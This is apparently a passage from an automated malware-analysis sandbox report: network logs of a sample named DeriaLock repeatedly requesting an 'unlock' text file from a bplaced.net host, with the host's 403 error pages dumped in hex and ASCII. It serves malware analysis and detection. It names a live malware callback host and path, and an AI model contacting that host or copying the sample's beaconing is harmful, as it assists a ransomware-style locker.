                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:51:12.136291981 CEST14706OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net
                                                                                                                                                Sep 29, 2022 14:51:13.163290977 CEST14713OUTGET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1
                                                                                                                                                Host: arizonacode.bplaced.net


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                128162.55.0.13780192.168.2.349791C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:50:15.395385027 CEST14259INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:15 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=142
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                Connection: Upgrade, Keep-Alive
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Keep-Alive: timeout=4, max=500
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://
                                                                                                                                                Sep 29, 2022 14:50:15.395417929 CEST14260INData Raw: 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon" href="https://www.bplaced.net/safari-pinned-tab.svg" color="#0b5fb4" /> <link rel="shortcut icon" type="image/x-icon" href="https://www.bplaced.net/favic
                                                                                                                                                Sep 29, 2022 14:50:15.395508051 CEST14262INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 69 73 69 62 6c 65 2d 78 73 20 76 69 73 69 62 6c 65 2d 73 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73
                                                                                                                                                Data Ascii: <div class="visible-xs visible-sm"> <div class="de init"> <div style="padding: 32% 1em 0 1%;"> Die gewnschte Seite ist nicht auffindbar.
                                                                                                                                                Sep 29, 2022 14:50:15.395540953 CEST14263INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 20 30 2e 39 65 6d 20 30 2e 35 65 6d 20 30 20 31 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61
                                                                                                                                                Data Ascii: <div style="padding: 0.9em 0.5em 0 1%;"> <div class="de init"> <a href="https://www.bplaced.net/datenschutz">Datenschutz</a> <a href="https://www.bplaced.net/impr
                                                                                                                                                Sep 29, 2022 14:50:15.395569086 CEST14264INData Raw: 69 74 65 72 68 65 6c 66 65 6e 21 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                Data Ascii: iterhelfen! </div> </div> <div class="en"> <div> Sorry, we can&lsquo;t find that page. </div>
                                                                                                                                                Sep 29, 2022 14:50:15.395596981 CEST14265INData Raw: 78 36 38 22 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 69 2c 6d 75 66 7a 3d 5f 30 78 64 63 36 30 5b 30 5d 2c 6c 61 6e 67 75 61 67 65 3b 76 61 72 20 70 72 6f 70 73 3d 5b 5f 30 78 64 63 36 30 5b 31 5d 2c 5f 30 78 64 63 36 30 5b 32 5d
                                                                                                                                                Data Ascii: x68"]; var i,mufz=_0xdc60[0],language;var props=[_0xdc60[1],_0xdc60[2],_0xdc60[3],_0xdc60[4]];if(Array[_0xdc60[7]](window[_0xdc60[6]][_0xdc60[5]])){for(i= 0;i< window[_0xdc60[6]][_0xdc60[5]][_0xdc60[8]];i++){language= window[_0xdc6
                                                                                                                                                Sep 29, 2022 14:50:16.228317022 CEST14267INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:16 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=108
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:16.228364944 CEST14268INData Raw: 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 73 61 66 61 72 69 2d 70 69 6e 6e 65 64 2d 74 61 62 2e 73 76 67 22 20 63 6f 6c 6f 72 3d 22 23 30 62 35 66 62 34 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c
                                                                                                                                                Data Ascii: href="https://www.bplaced.net/safari-pinned-tab.svg" color="#0b5fb4" /> <link rel="shortcut icon" type="image/x-icon" href="https://www.bplaced.net/favicon.ico"> <link rel="stylesheet" type="text/css" href="https://www.bplaced.
                                                                                                                                                Sep 29, 2022 14:50:16.228858948 CEST14269INData Raw: 3d 22 64 65 20 69 6e 69 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 20 33 32 25 20 31 65 6d 20 30 20 31 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                Data Ascii: ="de init"> <div style="padding: 32% 1em 0 1%;"> Die gewnschte Seite ist nicht auffindbar. </div> <div style="padding: 1em 1em 4em 1%;">
                                                                                                                                                Sep 29, 2022 14:50:16.229379892 CEST14271INData Raw: 73 73 3d 22 64 65 20 69 6e 69 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 64 61 74 65 6e 73 63 68 75 74 7a
                                                                                                                                                Data Ascii: ss="de init"> <a href="https://www.bplaced.net/datenschutz">Datenschutz</a> <a href="https://www.bplaced.net/impressum">Impressum</a> <a href="/" onclick="javascript:mufzS
                                                                                                                                                Sep 29, 2022 14:50:16.229475021 CEST14272INData Raw: 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                Data Ascii: <div class="en"> <div> Sorry, we can&lsquo;t find that page. </div> <div style="padding: 1em 1em 4em 0;"> Y
                                                                                                                                                Sep 29, 2022 14:50:16.229511976 CEST14273INData Raw: 2c 5f 30 78 64 63 36 30 5b 33 5d 2c 5f 30 78 64 63 36 30 5b 34 5d 5d 3b 69 66 28 41 72 72 61 79 5b 5f 30 78 64 63 36 30 5b 37 5d 5d 28 77 69 6e 64 6f 77 5b 5f 30 78 64 63 36 30 5b 36 5d 5d 5b 5f 30 78 64 63 36 30 5b 35 5d 5d 29 29 7b 66 6f 72 28
                                                                                                                                                Data Ascii: ,_0xdc60[3],_0xdc60[4]];if(Array[_0xdc60[7]](window[_0xdc60[6]][_0xdc60[5]])){for(i= 0;i< window[_0xdc60[6]][_0xdc60[5]][_0xdc60[8]];i++){language= window[_0xdc60[6]][_0xdc60[5]][i];if(language&& language[_0xdc60[8]]){mufz= language;break}}};f
                                                                                                                                                Sep 29, 2022 14:50:17.194144964 CEST14275INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:17 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=111
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:18.361566067 CEST14283INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:18 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=117
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
